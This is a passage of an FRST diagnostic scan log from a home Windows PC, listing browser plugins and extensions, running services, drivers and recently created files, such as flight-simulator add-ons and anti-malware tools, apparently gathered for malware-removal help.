FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-10] (Intel Corporation)

FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-10] (Intel Corporation)

FF Plugin-x32: @java.com/DTPlugin,version=11.60.2 -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\dtplugin\npDeployJava1.dll [2015-10-16] (Oracle Corporation)

FF Plugin-x32: @java.com/JavaPlugin,version=11.60.2 -> C:\Program Files (x86)\Java\jre1.8.0_60\bin\plugin2\npjp2.dll [2015-10-16] (Oracle Corporation)

FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2016-07-07] ()

FF Plugin-x32: @mcafee.com/MVT -> C:\Program Files (x86)\McAfee\Supportability\MVT\NPMVTPlugin.dll [2014-12-08] (McAfee, Inc.)

FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-10-07] (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)

FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)

FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)

FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-09-30] (Adobe Systems Inc.)

FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2015-03-09] (Adobe Systems)

FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @nsroblox.roblox.com/launcher -> C:\Users\Kyle Aniel\AppData\Local\Roblox\Versions\version-f57d20c466824405\\NPRobloxProxy.dll [2013-01-01] ( ROBLOX Corporation)

FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @nsroblox.roblox.com/launcher64 -> C:\Users\Kyle Aniel\AppData\Local\Roblox\Versions\version-f57d20c466824405\\NPRobloxProxy64.dll [2013-01-01] ( ROBLOX Corporation)

FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @talk.google.com/GoogleTalkPlugin -> C:\Users\Kyle Aniel\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll [2015-12-08] (Google)

FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @talk.google.com/O1DPlugin -> C:\Users\Kyle Aniel\AppData\Roaming\Mozilla\plugins\npo1d.dll [2015-12-08] (Google)

FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @tools.google.com/Google Update;version=3 -> C:\Users\Kyle Aniel\AppData\Local\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-12] (Google Inc.)

FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @tools.google.com/Google Update;version=9 -> C:\Users\Kyle Aniel\AppData\Local\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-12] (Google Inc.)

FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Kyle Aniel\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-08-28] (Unity Technologies ApS)

 

Chrome:

=======

CHR DefaultSearchURL: Default -> hxxps://search.yahoo.com/search?fr=mcafee&type=C215US756D20151120&p={searchTerms}

CHR DefaultSearchKeyword: Default -> McAfee

CHR Profile: C:\Users\banie_000\AppData\Local\Google\Chrome\User Data\Default [2016-10-02]

CHR Extension: (Google Docs) - C:\Users\banie_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-08-04]

CHR Extension: (SiteAdvisor) - C:\Users\banie_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2016-08-04]

CHR Extension: (Chrome Web Store Payments) - C:\Users\banie_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-08-04]

CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-04-21]

CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-04-21]

 

==================== Services (Whitelisted) ====================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

R2 AdAppMgrSvc; C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe [599944 2014-12-04] (Autodesk Inc.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.)

S3 BstHdAndroidSvc; C:\Program Files (x86)\Bluestacks\HD-Service.exe [445976 2016-09-29] (BlueStack Systems, Inc.)

R2 BstHdLogRotatorSvc; C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe [425496 2016-09-29] (BlueStack Systems, Inc.)

S3 BstHdPlusAndroidSvc; C:\Program Files (x86)\Bluestacks\HD-Plus-Service.exe [466456 2016-09-29] (BlueStack Systems, Inc.)

R2 chromoting; C:\Program Files (x86)\Google\Chrome Remote Desktop\52.0.2743.48\remoting_host.exe [76616 2016-06-20] (Google Inc.)

R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3291848 2016-10-08] (Microsoft Corporation)

S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1467072 2016-06-22] (Disc Soft Ltd)

R2 gramblrclient; C:\Program Files\Gramblr\gramblr.exe [10220624 2016-10-13] () [File not signed]

R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)

R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2014-06-03] (Hewlett-Packard Company) [File not signed]

R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)

R2 HPWMISVC; C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [602888 2015-06-29] (Hewlett-Packard Development Company, L.P.)

R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-11-08] (Intel Corporation)

S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]

R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [365032 2016-01-26] (Intel Corporation)

R2 IHA_MessageCenter; C:\Program Files (x86)\Verizon\IHA_MessageCenter\Bin\Verizon_IHAMessageCenter.exe [372736 2015-01-27] (Verizon) [File not signed]

R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]

S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)

R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-12-10] (Intel Corporation)

R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-12-10] (Intel Corporation)

R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes)

R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes)

R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [166152 2016-10-03] (McAfee, Inc.)

R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [993824 2016-07-07] (McAfee, Inc.)

S3 McAWFwk; C:\Program Files\Common Files\McAfee\ActWiz\McAWFwk.exe [334608 2013-07-24] (McAfee, Inc.)

R2 McBootDelayStartSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)

R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.9.829.0\\McCSPServiceHost.exe [1910000 2016-05-31] (McAfee, Inc.)

R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)

R2 McNaiAnn; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)

S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [816128 2016-06-21] (McAfee, Inc.)

S4 McOobeSv2; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)

R2 mcpltsvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)

R2 McProxy; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)

R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [232688 2016-04-26] (McAfee, Inc.)

R2 mfeicfcore; C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe [2763896 2013-08-19] (McAfee, Inc.)

R2 mfeicfupdate; C:\Program Files (x86)\Internet Content Filter\UpdateService.exe [2260208 2013-08-19] (McAfee, Inc.)

R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [382456 2016-06-23] (McAfee, Inc.)

R2 mfevtp; C:\Windows\system32\mfevtps.exe [277744 2016-04-26] (McAfee, Inc.)

R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1454216 2016-06-17] (McAfee, Inc.)

S3 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)

R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [88064 2014-03-28] (Softex Inc.) [File not signed]

R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [1045336 2016-05-25] (Intel Security, Inc.)

R2 PMBDeviceInfoProvider; C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe [494592 2015-04-17] (Sony Corporation)

R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [303360 2015-07-03] (Realtek Semiconductor)

R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [255096 2015-12-11] (Synaptics Incorporated)

S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)

S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)

R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]

 

===================== Drivers (Whitelisted) ======================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

S3 BstHdDrv; C:\Program Files (x86)\Bluestacks\HD-Hypervisor-amd64.sys [152672 2016-09-29] (BlueStack Systems)

S3 BstkDrv; C:\Program Files (x86)\Bluestacks\BstkDrv.sys [270904 2016-09-27] (Bluestack System Inc. )

R3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [78632 2016-04-27] (McAfee, Inc.)

R1 CLVirtualDrive; C:\WINDOWS\system32\DRIVERS\CLVirtualDrive.sys [91912 2013-11-12] (CyberLink)

S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)

R3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2016-07-30] (Disc Soft Ltd)

R3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [47672 2016-07-30] (Disc Soft Ltd)

S3 HipShieldK; C:\WINDOWS\System32\drivers\HipShieldK.sys [207968 2016-02-24] (McAfee, Inc.)

R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [349960 2016-07-12] (Intel Corporation)

R3 ikbevent; C:\WINDOWS\system32\DRIVERS\ikbevent.sys [21408 2013-08-13] ()

R3 imsevent; C:\WINDOWS\system32\DRIVERS\imsevent.sys [21920 2013-08-13] ()

R3 ISCT; C:\WINDOWS\System32\drivers\ISCTD64.sys [46568 2013-08-13] ()

R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes)

S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-10-18] (Malwarebytes)

R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [65408 2016-03-10] (Malwarebytes Corporation)

S0 megasas2i; C:\WINDOWS\System32\drivers\MegaSas2i.sys [64352 2016-10-05] (Avago Technologies)

R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [419616 2016-04-27] (McAfee, Inc.)

S3 mfeapfk; C:\WINDOWS\System32\drivers\mfeapfk.sys [181584 2014-10-01] (McAfee, Inc.)

R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [349480 2016-04-27] (McAfee, Inc.)

S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [83608 2016-04-27] (McAfee, Inc.)

R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [493352 2016-04-27] (McAfee, Inc.)

R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [843048 2016-04-27] (McAfee, Inc.)

R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [519976 2016-04-27] (McAfee, Inc.)

S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [100136 2016-04-27] (McAfee, Inc.)

R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [46240 2016-06-06] (McAfee, Inc.)

R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [243488 2016-04-27] (McAfee, Inc.)

S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()

R3 NETwNb64; C:\WINDOWS\System32\drivers\Netwbw02.sys [3506464 2015-11-15] (Intel Corporation)

R3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [751632 2015-05-14] (Realsil Semiconductor Corporation)

S3 SmbDrv; C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [30448 2014-04-10] (Synaptics Incorporated)

R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [51320 2015-12-11] (Synaptics Incorporated)

S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)

R3 sthid; C:\WINDOWS\System32\drivers\sthid.sys [21216 2016-09-01] (Splashtop Inc.)

R1 VBoxNetAdp; C:\WINDOWS\system32\DRIVERS\VBoxNetAdp6.sys [121248 2016-09-12] (Oracle Corporation)

R1 VBoxNetLwf; C:\WINDOWS\system32\DRIVERS\VBoxNetLwf.sys [195936 2016-09-12] (Oracle Corporation)

S2 vcs; C:\Program Files (x86)\Common Files\Avnex\vcs64.sys [4096 2016-08-05] () [File not signed]

R3 VCSVADHWSer; C:\WINDOWS\system32\DRIVERS\vcsvad.sys [29320 2015-10-01] (AVSOFT Corp.)

R3 VirtualButtons; C:\WINDOWS\System32\drivers\VirtualButtons.sys [32024 2013-10-04] (Intel Corporation)

S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)

S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)

S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)

R3 WirelessButtonDriver; C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys [20800 2013-07-22] (Hewlett-Packard Development Company, L.P.)

R3 XSplit_Dummy; C:\WINDOWS\system32\drivers\xspltspk.sys [26200 2015-05-25] (SplitmediaLabs Limited)

S3 YMIDUSBW; C:\WINDOWS\system32\drivers\ymidusbx64.sys [43744 2015-07-28] (Yamaha Corporation)

U3 aspnet_state; no ImagePath

 

==================== NetSvcs (Whitelisted) ===================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

 

==================== One Month Created files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2016-10-20 07:28 - 2016-10-20 07:28 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\4317019a

2016-10-20 07:28 - 2016-10-20 07:28 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\14ea33ba

2016-10-19 15:10 - 2016-10-19 16:52 - 1211959812 _____ C:\Users\Kyle Aniel\Desktop\FINAL.mp4

2016-10-19 14:57 - 2016-10-19 15:00 - 00075420 _____ C:\Users\Kyle Aniel\Downloads\Addition.txt

2016-10-19 14:47 - 2016-10-20 15:01 - 00040292 _____ C:\Users\Kyle Aniel\Downloads\FRST.txt

2016-10-19 14:47 - 2016-10-19 16:31 - 00000000 ____D C:\FRST

2016-10-19 14:47 - 2016-10-19 14:47 - 02407424 _____ (Farbar) C:\Users\Kyle Aniel\Downloads\FRST64.exe

2016-10-19 06:30 - 2016-10-20 05:17 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\f70e5

2016-10-18 23:53 - 2016-10-18 23:53 - 00416068 _____ C:\WINDOWS\Minidump\101816-28921-01.dmp

2016-10-18 23:53 - 2016-10-18 23:53 - 00000000 ____D C:\WINDOWS\Minidump

2016-10-18 18:53 - 2016-10-18 18:53 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys

2016-10-18 18:52 - 2016-10-18 19:40 - 00001172 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk

2016-10-18 18:52 - 2016-10-18 18:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware

2016-10-18 18:52 - 2016-10-18 18:52 - 00000000 ____D C:\ProgramData\Malwarebytes

2016-10-18 18:52 - 2016-10-18 18:52 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware

2016-10-18 18:52 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys

2016-10-18 18:52 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys

2016-10-18 18:52 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys

2016-10-18 18:50 - 2016-10-18 18:53 - 00003198 _____ C:\Users\banie_000\Desktop\Rkill.txt

2016-10-18 18:50 - 2016-10-18 18:51 - 22851472 _____ (Malwarebytes ) C:\Users\Kyle Aniel\Downloads\mbam-setup-2.2.1.1043.exe

2016-10-18 18:48 - 2016-10-18 18:50 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\Kyle Aniel\Downloads\rkill.exe

2016-10-18 14:17 - 2016-10-18 14:17 - 00000000 ____D C:\Quarantine

2016-10-18 14:16 - 2016-10-18 14:15 - 16056688 _____ (McAfee Inc) C:\Users\Kyle Aniel\Desktop\stinger64.exe

2016-10-17 21:28 - 2016-10-17 21:30 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\ont2012xnj

2016-10-17 21:28 - 2016-10-17 21:30 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\ont2012x

2016-10-17 21:26 - 2016-10-17 21:26 - 40738663 _____ C:\Users\Kyle Aniel\Downloads\ont2012x.zip

2016-10-17 21:26 - 2016-10-17 21:26 - 00590905 _____ C:\Users\Kyle Aniel\Downloads\ont2012xnj.zip

2016-10-17 21:17 - 2016-10-17 21:17 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\md80_cls_american_airlines

2016-10-17 21:16 - 2016-10-17 21:17 - 04223899 _____ C:\Users\Kyle Aniel\Downloads\md80_cls_american_airlines.zip

2016-10-17 20:22 - 2016-10-17 20:22 - 16057249 _____ C:\Users\Kyle Aniel\Downloads\Panama City Beach Sunset Time-Lapse.mp4

2016-10-17 19:20 - 2016-10-17 19:35 - 681446176 _____ C:\Users\Kyle Aniel\Desktop\nana project.mp4

2016-10-17 18:43 - 2016-10-17 18:43 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\2016-10

2016-10-16 20:26 - 2016-10-16 20:26 - 03546096 _____ C:\Users\Kyle Aniel\Downloads\Flight1_Coolsky_Super_keygen (1).zip

2016-10-16 20:26 - 2016-10-16 20:26 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\35554

2016-10-16 20:22 - 2016-10-16 20:25 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\Flight1_Coolsky_Super_keygen

2016-10-16 20:22 - 2016-10-16 20:23 - 84771760 _____ ( Flight1, Inc.) C:\Users\Kyle Aniel\Downloads\Super80-Professional.exe

2016-10-16 20:22 - 2016-10-16 20:22 - 05123441 _____ C:\Users\Kyle Aniel\Downloads\Flight1_Coolsky_Super_keygen.zip

2016-10-16 17:58 - 2016-10-16 19:33 - 00148096 _____ C:\Users\Kyle Aniel\Desktop\nana project.wlmp

2016-10-16 17:17 - 2016-10-16 17:18 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\edited picture

2016-10-16 06:34 - 2016-10-18 19:40 - 00002597 _____ C:\Users\Public\Desktop\AESHelp for FSX.lnk

2016-10-16 06:32 - 2016-10-16 06:32 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\Aerosoft - Airport Enhancement Services (AES)2.21

2016-10-16 06:31 - 2016-10-16 06:31 - 59054928 _____ C:\Users\Kyle Aniel\Downloads\Aerosoft - Airport Enhancement Services (AES)2.21.rar

2016-10-15 21:17 - 2016-10-15 21:17 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\MD-8x

2016-10-15 21:11 - 2016-10-15 21:11 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSUIPC 4.858

2016-10-15 21:03 - 2016-10-15 21:10 - 09338380 _____ C:\Users\Kyle Aniel\Downloads\FSUIPC 4.858.rar

2016-10-15 16:49 - 2016-10-15 17:00 - 2048196608 _____ C:\Users\Kyle Aniel\Downloads\7601.17514.101119-1850_Update_Sp_Wave1-GRMSP1.1_DVD.iso

2016-10-15 15:23 - 2016-10-15 15:24 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\boeing777v2

2016-10-15 15:22 - 2016-10-15 15:23 - 07004238 _____ C:\Users\Kyle Aniel\Downloads\boeing777v2.zip

2016-10-15 15:07 - 2016-10-15 15:07 - 01567616 _____ C:\Users\Kyle Aniel\Downloads\p787msx.zip

2016-10-15 11:57 - 2016-10-15 11:58 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\Fs_Panel_Studio_keygen_by_Inferno

2016-10-15 11:57 - 2016-10-15 11:57 - 05050888 _____ C:\Users\Kyle Aniel\Downloads\Fs_Panel_Studio_keygen_by_Inferno.zip

2016-10-15 09:35 - 2016-10-15 09:35 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\BOEING_777_Panel

2016-10-15 09:32 - 2016-10-15 09:32 - 02200036 _____ C:\Users\Kyle Aniel\Downloads\BOEING_777_Panel.zip

2016-10-15 09:18 - 2016-10-15 09:18 - 28339782 _____ C:\Users\Kyle Aniel\Downloads\skyspirit2012_american_airlines_boeing_777-300er_n717an.zip

2016-10-15 09:18 - 2016-10-15 09:18 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\skyspirit2012_american_airlines_boeing_777-300er_n717an

2016-10-15 09:07 - 2016-10-15 09:08 - 55849165 _____ C:\Users\Kyle Aniel\Downloads\SkySpirit-PSS-B777-300ER-Merge.rar

2016-10-15 09:07 - 2016-10-15 09:07 - 10424790 _____ C:\Users\Kyle Aniel\Downloads\SKYSPIRIT2012 777-300ER American Airlines N717AN 2013.rar

2016-10-15 07:57 - 2016-10-15 07:57 - 00018081 _____ C:\Users\Kyle Aniel\Downloads\f-s-x-777-300-expansion-models.torrent

2016-10-14 23:46 - 2016-10-14 23:46 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSND_FSX_MD83

2016-10-14 23:44 - 2016-10-14 23:46 - 67436368 _____ C:\Users\Kyle Aniel\Downloads\FSND_FSX_MD83.zip

2016-10-14 23:16 - 2016-10-14 23:16 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Microsoft_Flight_Simulator_X_Deluxe_Edition

2016-10-14 22:55 - 2016-10-14 22:55 - 03794912 _____ C:\Users\Kyle Aniel\Downloads\MJ772BHC.zip

2016-10-14 22:55 - 2016-10-14 22:55 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\MJ772BHC

2016-10-14 22:53 - 2016-10-14 22:53 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\em77fsx

2016-10-14 22:44 - 2016-10-14 22:50 - 16805219 _____ C:\Users\Kyle Aniel\Downloads\em77fsx.zip

2016-10-13 21:00 - 2016-10-13 21:11 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\CLS Boeing 747-200 v1

2016-10-13 20:38 - 2016-10-18 19:38 - 00001243 _____ C:\Users\banie_000\Desktop\Jed's Half-Life Model Viewer.lnk

2016-10-13 20:38 - 2016-10-13 20:38 - 00195825 _____ C:\Users\Kyle Aniel\Downloads\hlmv136_setup.zip

2016-10-13 20:38 - 2016-10-13 20:38 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\hlmv136_setup

2016-10-13 20:38 - 2016-10-13 20:38 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jed's Half-Life Model Viewer 1.3.6

2016-10-13 20:38 - 2016-10-13 20:38 - 00000000 ____D C:\Program Files (x86)\Jed's Half-Life Model Viewer 1.3.6

2016-10-13 20:36 - 2016-10-13 20:36 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Blender Foundation

2016-10-13 19:26 - 2016-10-13 19:26 - 00000210 _____ C:\MD81_.ini

2016-10-13 17:40 - 2016-10-13 17:40 - 00003454 _____ C:\WINDOWS\System32\Tasks\{7710BCDD-6C09-4CB1-A71B-FCC26146EBCA}

2016-10-13 17:24 - 2016-10-13 17:24 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSUIPC 4.927a_&_WideFS_6.995

2016-10-13 17:21 - 2016-10-13 17:21 - 04526316 _____ C:\Users\Kyle Aniel\Downloads\FSUIPC 4.927a_&_WideFS_6.995.rar

2016-10-13 17:16 - 2016-10-13 17:21 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSUIPC4

2016-10-13 17:16 - 2016-10-13 17:16 - 03988172 _____ C:\Users\Kyle Aniel\Downloads\FSUIPC4.zip

2016-10-13 16:53 - 2016-10-18 19:38 - 00001644 _____ C:\Users\banie_000\Desktop\Where are the manuals.doc.lnk

2016-10-13 16:53 - 2016-10-18 19:38 - 00001614 _____ C:\Users\banie_000\Desktop\RFP June Update.doc.lnk

2016-10-13 16:51 - 2016-10-13 16:51 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\ready_for_pushback_boeing_747-200v2_fs2004

2016-10-13 15:28 - 2016-10-05 03:34 - 01051104 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi

2016-10-13 15:28 - 2016-10-05 03:34 - 00894088 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe

2016-10-13 15:28 - 2016-10-05 03:31 - 02213248 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll

2016-10-13 15:28 - 2016-10-05 03:31 - 01353768 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi

2016-10-13 15:28 - 2016-10-05 03:31 - 01172472 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe

2016-10-13 15:28 - 2016-10-05 03:17 - 01322848 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll

2016-10-13 15:28 - 2016-10-05 03:13 - 02750384 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll

2016-10-13 15:28 - 2016-10-05 03:13 - 01859264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll

2016-10-13 15:28 - 2016-10-05 03:13 - 00146784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll

2016-10-13 15:28 - 2016-10-05 03:12 - 02446696 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll

